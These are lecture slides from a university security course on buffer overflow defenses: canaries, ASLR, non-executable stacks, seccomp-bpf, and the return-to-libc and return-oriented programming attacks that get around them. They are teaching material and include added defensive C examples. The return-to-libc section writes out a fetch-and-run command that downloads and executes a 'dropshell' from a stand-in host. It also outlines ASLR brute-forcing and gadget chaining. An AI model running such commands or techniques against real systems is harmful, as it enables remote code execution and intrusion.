![Page 1: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/1.jpg)
BUFFER OVERFLOW DEFENSES & COUNTERMEASURES
CMSC 414, FEB 01 2018
RECALL OUR CHALLENGES
• Putting code into the memory (no zeroes)
• Finding the return address (guess the raw address)
• Getting %eip to point to our code (distance from the buffer to the stored %eip)
How can we make these even more difficult?
DETECTING OVERFLOWS WITH CANARIES
[figure: a stack frame with a local buffer ("00 00 00 00 …"), then a canary word (02 8d e2 10) placed between the buffer and the saved %ebp, saved %eip and &arg1; an overflow that writes "nop nop nop … 0xbdf \x0f \x3c \x2f ..." through the buffer overwrites the canary on its way to the saved %eip. Before the function returns, the canary is compared against its expected value.]
Not the expected value: abort
What value should the canary have?
CANARY VALUES
1. Terminator canaries (CR, LF, NULL, -1)
   • Leverages the fact that scanf etc. don't allow these
2. Random canaries
   • Write a new random value @ each process start
   • Save the real value somewhere in memory
   • Must write-protect the stored value
3. Random XOR canaries
   • Same as random canaries
   • But store canary XOR some control info, instead
From StackGuard [Wagle & Cowan]
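As an added example (not from the slides and not StackGuard's own code), the following C program models the three canary policies above on a struct that stands in for one stack frame; the frame layout, the per-process secret, the saved-register values and the inputs are all constructed for the demo.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of one x86 stack frame, in the same order as the lecture
 * diagram: local buffer, then the canary, then the saved %ebp and saved %eip.
 * A plain struct stands in for the real stack so the program runs anywhere
 * without corrupting its own frame. */
enum { BUF_SIZE = 16 };
struct frame {
    char     buf[BUF_SIZE];
    uint32_t canary;
    uint32_t saved_ebp;
    uint32_t saved_eip;
};

enum policy { TERMINATOR, RANDOM, RANDOM_XOR };

/* StackGuard's terminator canary: NUL, LF, -1 (0xff), CR. Little-endian it sits
 * in memory as 0d ff 0a 00, so a string copy running past the buffer either
 * stops at the 0x00 or overwrites it. */
#define TERMINATOR_CANARY 0x000aff0du

/* Stand-in for the per-process random value. A real implementation draws it at
 * process start and keeps the stored copy write-protected; here it is a
 * constructed constant so the scenarios are reproducible. */
#define DEMO_SECRET 0x9d3c17e2u

/* The canary a frame should hold under each policy. RANDOM_XOR ties the canary
 * to the control data it guards (here the saved %eip). */
static uint32_t expected_canary(enum policy p, uint32_t secret, uint32_t saved_eip)
{
    switch (p) {
    case TERMINATOR: return TERMINATOR_CANARY;
    case RANDOM:     return secret;
    default:         return secret ^ saved_eip;
    }
}

/* Prologue: lay out the frame and plant the canary. */
static void prologue(struct frame *f, enum policy p, uint32_t secret,
                     uint32_t ebp, uint32_t eip)
{
    memset(f->buf, 0, sizeof f->buf);
    f->saved_ebp = ebp;
    f->saved_eip = eip;
    f->canary = expected_canary(p, secret, eip);
}

/* Epilogue check: 1 if the canary still matches and the function may return,
 * 0 if StackGuard would abort ("Not the expected value: abort"). */
static int epilogue_check(const struct frame *f, enum policy p, uint32_t secret)
{
    return f->canary == expected_canary(p, secret, f->saved_eip);
}

/* The bug under study: an unbounded strcpy into f->buf. Bytes past the buffer
 * land on the canary, the saved %ebp and the saved %eip, in that order. The
 * copy is capped at the model frame's size only to keep the simulation in bounds. */
static void vulnerable_copy(struct frame *f, const char *src)
{
    char *dst = (char *)f;
    size_t i = 0;
    for (; i < sizeof *f && src[i] != '\0'; i++)
        dst[i] = src[i];
    if (i < sizeof *f)
        dst[i] = '\0';
}

/* One scenario: copy `input` into the frame; if tamper_eip is set, additionally
 * overwrite only the saved %eip (a write that skips the canary). Returns the
 * epilogue verdict: 1 = return normally, 0 = abort. */
static int run_scenario(enum policy p, const char *input, int tamper_eip)
{
    struct frame f;
    prologue(&f, p, DEMO_SECRET, 0xbffff4d8u, 0x080484a0u); /* constructed ebp/eip */
    vulnerable_copy(&f, input);
    if (tamper_eip)
        f.saved_eip = 0xdeadbeefu;
    return epilogue_check(&f, p, DEMO_SECRET);
}

int main(void)
{
    const char *overflow = "AAAAAAAAAAAAAAAAAAAAAAAAAAA"; /* 27 bytes: reaches saved %eip */
    static const char *names[] = { "terminator", "random", "random-xor" };
    for (int p = TERMINATOR; p <= RANDOM_XOR; p++)
        printf("%-10s  benign: %s  overflow: %s  eip-only write: %s\n", names[p],
               run_scenario(p, "hello", 0)  ? "return" : "abort",
               run_scenario(p, overflow, 0) ? "return" : "abort",
               run_scenario(p, "hello", 1)  ? "return" : "abort");
    return 0;
}
```

The terminator and plain random canaries both let the eip-only write through, which is the gap the XOR variant closes by binding the canary to the saved return address.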
RECALL OUR CHALLENGES
• Putting code into the memory (no zeroes)
• Finding the return address (guess the raw address)
• Getting %eip to point to our code (distance from the buffer to the stored %eip)
How can we make these even more difficult?
Option: Make this detectable with canaries
ADDRESS SPACE LAYOUT RANDOMIZATION
[figure: 32-bit process address space from 0x00000000 (0) at the bottom to 0xffffffff (4G) at the top]
  Text                                      known at compile time
  Init'd data     static const int y=10;    known at compile time
  Uninit'd data   static int x;             known at compile time
  Heap            malloc(sizeof(long));     runtime
  Stack           int f() { int x; … }      runtime
  cmdline & env                             set when process starts
Randomize where exactly these regions start
ADDRESS SPACE LAYOUT RANDOMIZATION
Shortcomings of ASLR
• Introduces return-to-libc attack
• Probes for location of usleep
• On 32-bit architectures, only 16 bits of entropy
• fork() keeps same offsets
RECALL OUR CHALLENGES
• Putting code into the memory (no zeroes)
• Finding the return address (guess the raw address)
• Getting %eip to point to our code (distance from the buffer to the stored %eip)
How can we make these even more difficult?
Option: Make this detectable with canaries
Option: Address Space Layout Randomization (ASLR)
GETTING %EIP TO POINT TO OUR CODE
Recall that all memory has Read, Write, and Execute permissions
[figure: the same 32-bit layout, 0x00000000 (0) to 0xffffffff (4G)]
  Text            must be executable
  Init'd data     must be readable & writeable
  Uninit'd data   must be readable & writeable
  Heap            must be readable & writeable
  Stack           must be readable & writeable; but does it need to be executable?
  cmdline & env
Basic idea: make the stack non-executable
RETURN TO LIBC
Preferred: strlcpy
char buf[4];
strncpy(buf, "hello!", sizeof(buf));   /* buf = {'h', 'e', 'l', 'l'}  (no NUL terminator) */
strlcpy(buf, "hello!", sizeof(buf));   /* buf = {'h', 'e', 'l', '\0'} (always NUL-terminated) */
RETURN TO LIBC
Exploit:
Goal: system("wget http://www.example.com/dropshell ; chmod +x dropshell ; ./dropshell");
Challenge: Non-executable stack
Insight: "system" already exists somewhere in libc
RETURN TO LIBC
[figure: the classic stack smash attempted against a non-executable stack: the buffer is filled with padding ("0xbdf 0xbdf 0xbdf ..."), a good guess of the buffer's address overwrites the saved %eip, and a nop sled ("nop nop nop …") leads into the malicious code ("\x0f \x3c \x2f ...") placed in the stack frame]
PANIC: address not executable
RETURN TO LIBC
[figure: the same overflow, but the overwritten saved %eip now points into libc (usleep() ... printf() ... system()); after the fake return address come a padding word and then the arguments, "wget example.com/..."]
How do we guess this address?
How do we ensure these are the args?
ARGUMENTS WHEN WE ARE SMASHING %EBP?
[figure: the overflowed frame; the saved %ebp is now DEADBEEF, the saved %eip is the address of system() in libc, and above them sit the padding word and the arguments "wget example.com/..."; the %esp and %ebp markers move as each instruction below executes]
The vulnerable function's epilogue runs first:
leave:  mov %ebp, %esp
        pop %ebp          (%ebp is now DEADBEEF)
ret:    pop %eip          (%eip is now the address of system())
At this point, we can't reliably access local variables
Then system()'s own prologue runs:
system: pushl %ebp        (pushes DEADBEEF)
        movl %esp, %ebp
Will expect args at 8(%ebp)
At this point, we can reliably access local variables
RETURN TO LIBC
How do we guess this address?
How do we ensure these are the args?   By prepending 4 byte padding
INFERRING ADDRESSES WITH ASLR
[figure: overflow layout with padding "AAAAAAAAAAAAAAAA", the overwritten saved %ebp "DEADBEEF", the saved %eip replaced by a guessed address of usleep(), then a padding word and the argument 0x01010101; the distance from usleep() to system() in libc is a known delta (by version of libc)]
Repeatedly guess the address of usleep
0x01010101 = smallest number w/o 0-byte ≈ 16 million == 16 sec of sleep
Wrong guess of usleep = crash; retry
Correct guess of usleep = response in 16 sec
Why this works: Every connection causes a fork; fork() does not re-randomize ASLR
RETURN TO LIBC
How do we guess this address?          By first guessing usleep
How do we ensure these are the args?   By prepending 4 byte padding
DEFENSE: JUST GET RID OF SYSTEM()?
[figure: the return-to-libc layout from before, with system() struck out of libc]
Idea: Remove any function call that (a) is not needed and (b) could wreak havoc
system(), exec(), connect(), open(), ...
RELATED IDEA: SECCOMP-BPF
• Linux system call enabled since 2.6.12 (2005)
• Affected process can subsequently only perform read, write, exit, and sigreturn system calls
  - No support for open call: Can only use already-open file descriptors
• Isolates a process by limiting possible interactions
• Follow-on work produced seccomp-bpf
  • Limit process to policy-specific set of system calls, subject to a policy handled by the kernel
  - Policy akin to Berkeley Packet Filters (BPF)
• Used by Chrome, OpenSSH, vsftpd, and others
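Added example (not from the slides, and not the filter used by Chrome, OpenSSH or vsftpd): a seccomp-bpf policy in C restricted to the read/write/exit/sigreturn set named above, together with a small user-space interpreter that evaluates the same filter so the policy can be checked before it is installed. The exit_group and rt_sigreturn entries, the architecture check and the sample syscalls are my assumptions.

```c
#include <fcntl.h>
#include <stddef.h>
#include <string.h>
#include <unistd.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <linux/audit.h>
#include <linux/filter.h>
#include <linux/seccomp.h>

/* Audit architecture this binary was built for; the filter's first rule kills
 * a process that switches syscall ABI, so the allow list cannot be sidestepped. */
#if defined(__x86_64__)
#define NATIVE_ARCH AUDIT_ARCH_X86_64
#elif defined(__aarch64__)
#define NATIVE_ARCH AUDIT_ARCH_AARCH64
#else
#error "add the AUDIT_ARCH_* value for this architecture"
#endif

/* Two BPF instructions: if the loaded syscall number equals nr, return ALLOW;
 * otherwise fall through to the next rule. */
#define ALLOW_SYSCALL(nr) \
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, (nr), 0, 1), \
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW)

/* The policy from the slide: read, write, exit and sigreturn only (exit_group
 * added because libc's exit() uses it; rt_sigreturn is the modern sigreturn).
 * Anything else, open/openat included, kills the process. */
static const struct sock_filter policy[] = {
    BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, arch)),
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, NATIVE_ARCH, 1, 0),
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),
    BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
    ALLOW_SYSCALL(__NR_read),
    ALLOW_SYSCALL(__NR_write),
    ALLOW_SYSCALL(__NR_exit),
    ALLOW_SYSCALL(__NR_exit_group),
    ALLOW_SYSCALL(__NR_rt_sigreturn),
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),
};
#define POLICY_LEN (sizeof policy / sizeof policy[0])

/* Minimal interpreter for the three instruction kinds the policy uses, so the
 * filter can be evaluated in user space (review, unit tests) the way the kernel
 * evaluates it on every syscall entry. Anything unrecognised denies. */
static unsigned int run_filter(const struct sock_filter *prog, size_t len,
                               const struct seccomp_data *data)
{
    const unsigned char *raw = (const unsigned char *)data;
    unsigned int acc = 0;
    size_t pc = 0;
    while (pc < len) {
        const struct sock_filter *ins = &prog[pc];
        switch (ins->code) {
        case BPF_LD | BPF_W | BPF_ABS:        /* acc = 32-bit word at data + k */
            if (ins->k + 4 > sizeof *data)
                return SECCOMP_RET_KILL;
            memcpy(&acc, raw + ins->k, 4);
            pc++;
            break;
        case BPF_JMP | BPF_JEQ | BPF_K:       /* skip jt (equal) or jf (not equal) */
            pc += 1 + (acc == ins->k ? ins->jt : ins->jf);
            break;
        case BPF_RET | BPF_K:                 /* final verdict */
            return ins->k;
        default:
            return SECCOMP_RET_KILL;
        }
    }
    return SECCOMP_RET_KILL;
}

/* Verdict the policy gives for syscall `nr` issued under ABI `arch`. */
static unsigned int decide(int nr, unsigned int arch)
{
    struct seccomp_data d = { .nr = nr, .arch = arch };
    return run_filter(policy, POLICY_LEN, &d);
}

/* Install the filter for real. NO_NEW_PRIVS must be set first so an unprivileged
 * process cannot hand a filter down to a setuid child. */
static int install_filter(void)
{
    struct sock_fprog prog = { .len = POLICY_LEN, .filter = (struct sock_filter *)policy };
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0)
        return -1;
    return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog);
}

int main(void)
{
    static const char msg[] = "filter on: write() works, open() is about to be killed\n";
    if (install_filter() != 0)
        return 1;
    write(1, msg, sizeof msg - 1);
    open("/etc/hostname", O_RDONLY);   /* openat is not on the allow list: SIGSYS */
    _exit(0);                          /* never reached */
}
```

Run stand-alone, the process prints the message and is then killed by SIGSYS on the open() call, which is the "no support for open" behaviour the slide describes.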
RETURN-ORIENTED PROGRAMMING
Shortcomings of removing functions from libc
• Introduces return-oriented programming
• Shows that any nontrivial amount of code will contain enough code sequences to permit virtually any ROP attack
CODE SEQUENCES IN LIBC
Code sequences exist in libc that were not placed there by the compiler
Find code sequences by starting at ret's (0xc3) and looking backwards for valid instructions
GADGETS
Recall the epilogue: each ret pops the next stack word into %eip, so the stack contents decide which code sequence runs next.
leave:  mov %ebp, %esp
        pop %ebp
ret:    pop %eip
[figure: a short code sequence ending in ret that loads %edx from the next stack word, with 0xdeadbeef placed there]
Effect: sets %edx to 0xdeadbeef
[figure residue: animated build-up of a gadget chain; register boxes %edx, %eax and %edi receive the values 7, 3 and 10 popped in turn from the stack]
GADGETS
%edx
%eax
mov %ebp %esp
pop %ebp
pop %eip
leave:
ret:
%edi7
10
7
![Page 73: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/73.jpg)
GADGETS
%edx
%eax
mov %ebp %esp
pop %ebp
pop %eip
leave:
ret:
%edi7
10
7
![Page 74: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/74.jpg)
GADGETS
%edx
%eax
mov %ebp %esp
pop %ebp
pop %eip
leave:
ret:
%edi7
10
7
![Page 75: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/75.jpg)
GADGETS
%edx
%eax
%edi7
10
7
next gadget
![Page 76: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/76.jpg)
GADGETS
%edx
%eax
%edi7
10
7
next gadget
Effect: adds 7 to %eax
![Page 77: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/77.jpg)
GADGETS
%edx
%eax
%edi7
10
7
next gadget
Effect: adds 7 to %eax Had to deal with the side-effect of push %edi
GADGETS
[Slides 78-92: animated walkthrough of a chain of gadgets loading registers; only the recoverable labels from the figure are kept]
Registers tracked in the animation: %eax, %ebx, %ecx, %edx
Values shown being placed from the stack: 0, 0x0b0b0b0b, 0xb, 0xb0
Effect: shell code
RECALL OUR CHALLENGES
• Putting code into the memory (no zeroes)
• Getting %eip to point to our code (dist buff to stored eip)
• Finding the return address (guess the raw address)
How can we make these even more difficult?
Option: Make this detectable with canaries
Non-executable stack doesn’t work so well
Address Space Layout Randomization (ASLR)
Best defense: Good programming practices
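As an added example (not part of the lecture slides), the two defensive points above in working C: a bounds-checked copy ("good programming practices") and a canary-style check that catches an overrun before the saved registers would be used. The record layout `struct frame`, the constant `CANARY_VALUE`, the input bytes and the function names are constructed for this illustration and are not the course's own code.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not from the lecture: a record laid out like the stack frame the
 * slides draw (buffer, then canary, then what would be the saved %ebp / %eip), so
 * a canary check and a bounds check can be shown without undefined behaviour.
 * The constant, struct and function names are constructed for this demo. */

#define BUF_SIZE 16
/* Constructed canary value; a real compiler-inserted canary is random per process
 * ("random canaries") or built from terminator bytes ("terminator canaries"). */
#define CANARY_VALUE 0x10e28d02u

struct frame {
    char buf[BUF_SIZE];
    uint32_t canary;    /* sits right after buf, so an overrun hits it first */
    uint32_t saved_ebp; /* stand-ins for the saved registers an overflow aims at */
    uint32_t saved_eip;
};

static void frame_init(struct frame *f) {
    memset(f, 0, sizeof *f);
    f->canary = CANARY_VALUE;
}

/* "Good programming practices": copy only if the input fits with its terminator.
 * Returns 0 on success, -1 if the input is rejected (nothing is written then). */
static int bounded_copy(struct frame *f, const char *src, size_t srclen) {
    if (srclen >= sizeof f->buf)
        return -1;
    memcpy(f->buf, src, srclen);
    f->buf[srclen] = '\0';
    return 0;
}

/* Models a strcpy-style write that stops only when the source runs out. To keep the
 * demo well-defined, the write is clamped to the record itself (real code would
 * keep going past it into the rest of the stack). */
static void unchecked_copy(struct frame *f, const unsigned char *src, size_t srclen) {
    if (srclen > sizeof *f)
        srclen = sizeof *f;
    memcpy((unsigned char *)f, src, srclen);
}

/* The check a canary-protected function performs before using the saved %eip:
 * 1 if the canary is intact, 0 if the frame was overrun. */
static int canary_intact(const struct frame *f) {
    return f->canary == CANARY_VALUE;
}

/* Scenario 1: bounds-checked path. Returns 1 if short input is accepted, oversized
 * input is rejected without writing anything, and the canary stays untouched. */
int demo_bounded_path(void) {
    struct frame f;
    frame_init(&f);
    if (bounded_copy(&f, "hello", 5) != 0) return 0;
    if (strcmp(f.buf, "hello") != 0) return 0;
    /* 16 bytes leave no room for the terminator, so this must be refused */
    if (bounded_copy(&f, "0123456789abcdef", 16) != -1) return 0;
    if (strcmp(f.buf, "hello") != 0) return 0;  /* rejected input wrote nothing */
    return canary_intact(&f);
}

/* Scenario 2: unchecked path fed input longer than the buffer. Returns 1 if the
 * canary check catches the overrun before the saved registers would be used. */
int demo_canary_detects_overrun(void) {
    struct frame f;
    unsigned char input[BUF_SIZE + 8];      /* constructed oversized input */
    frame_init(&f);
    memset(input, 'A', sizeof input);
    unchecked_copy(&f, input, sizeof input);
    /* canary now reads 0x41414141 rather than CANARY_VALUE */
    return !canary_intact(&f);
}

int main(void) {
    printf("bounded path ok: %d\n", demo_bounded_path());
    printf("canary detected overrun: %d\n", demo_canary_detects_overrun());
    return 0;
}
```

The bounded copy removes the overflow entirely, which is why the slide calls good programming practice the best defense; the canary only turns an overrun that still happens into a detected failure before the corrupted saved %eip is used. The unchecked path is clamped to the record so the demo itself remains well-defined C.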
BUFFER OVERFLOW PREVALENCE
[Chart: buffer overflows as a share of all reported vulnerabilities; x-axis years 1997 to 2015, y-axis 0 to 16; figure residue removed]
Significant percent of all vulnerabilities
Data from the National Vulnerability Database